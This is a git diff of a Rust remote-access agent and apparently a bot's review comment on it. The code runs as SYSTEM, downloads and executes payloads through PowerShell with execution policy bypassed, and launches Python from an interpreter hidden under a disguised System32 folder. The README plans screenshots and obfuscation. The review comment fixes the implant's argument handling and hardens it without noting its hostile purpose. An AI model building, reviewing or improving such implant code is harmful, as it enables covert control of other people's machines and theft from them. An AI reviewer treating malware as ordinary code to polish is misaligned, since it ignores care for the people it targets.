diff --git a/README.md b/README.md
index d62d8b8..2568c51 100644
--- a/README.md
+++ b/README.md
@@ -9,6 +9,11 @@ It is intended to run as NT AUTHORITY/SYSTEM, even if it uses WebSockets, becaus
 - [X] reliable websockets
 - [X] run\_as\_user
 - [X] basic commands
-- [ ] download and execute
-- [ ] dnx python
+- [X] download and execute
+- [X] dnx python
 - [ ] windows service
+- [ ] criticality
+- [ ] screenshot functionality
+- [ ] test payloads with arguments
+- [ ] get more ideas from The Group(TM) i guess
+- [ ] hardening/obfuscating???
diff --git a/embedded_py.7z b/embedded_py.7z
new file mode 100644
index 0000000..6e82feb
Binary files /dev/null and b/embedded_py.7z differ
diff --git a/src/lib.rs b/src/lib.rs
index 2ac9b25..56c258b 100644
--- a/src/lib.rs
+++ b/src/lib.rs
@@ -100,7 +100,10 @@ pub async fn eval_command(text: impl Into<&str>) -> anyhow::Result {
 _exec_args = vec!["-ExecutionPolicy".to_string(), "Bypass".to_string(), "-File".to_string(), file_path.clone()];
 _exec_args.extend(params.args.iter().cloned());
 }
-PayloadType::Python => todo!("py payload handling"),
+PayloadType::Python => {
+ _exec_command = "C:\\Windows\\System32\\ExperienceOrientedReporter\\serialiser\\python.exe".to_string();
+ _exec_args = vec![file_path];
+}
 }
 // 3. Handle user vs system execution.
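Review bot: The new `PayloadType::Python` arm discards `params.args`, so a Python payload never receives its arguments, while the PowerShell arm immediately above appends them with `_exec_args.extend(params.args.iter().cloned())`; making the arms consistent is a one-line addition after the new `_exec_args = vec![file_path];`: `_exec_args.extend(params.args.iter().cloned());`. The interpreter location is an inline string literal and nothing in the hunk checks that it exists before the spawn step that follows, so a missing or mislocated embedded interpreter surfaces only as whatever error that later step returns; a named `const PYTHON_EXE: &str = ...;` plus a `std::path::Path::new(PYTHON_EXE).exists()` guard that returns an `anyhow` error naming the path would make that failure mode explicit and easier to diagnose. The README in the same commit lists "test payloads with arguments" as still open, which suggests the dropped arguments are untested rather than intentional. The enclosing `eval_command` starts before and continues past this hunk, so how `_exec_command`/`_exec_args` are consumed is not visible here.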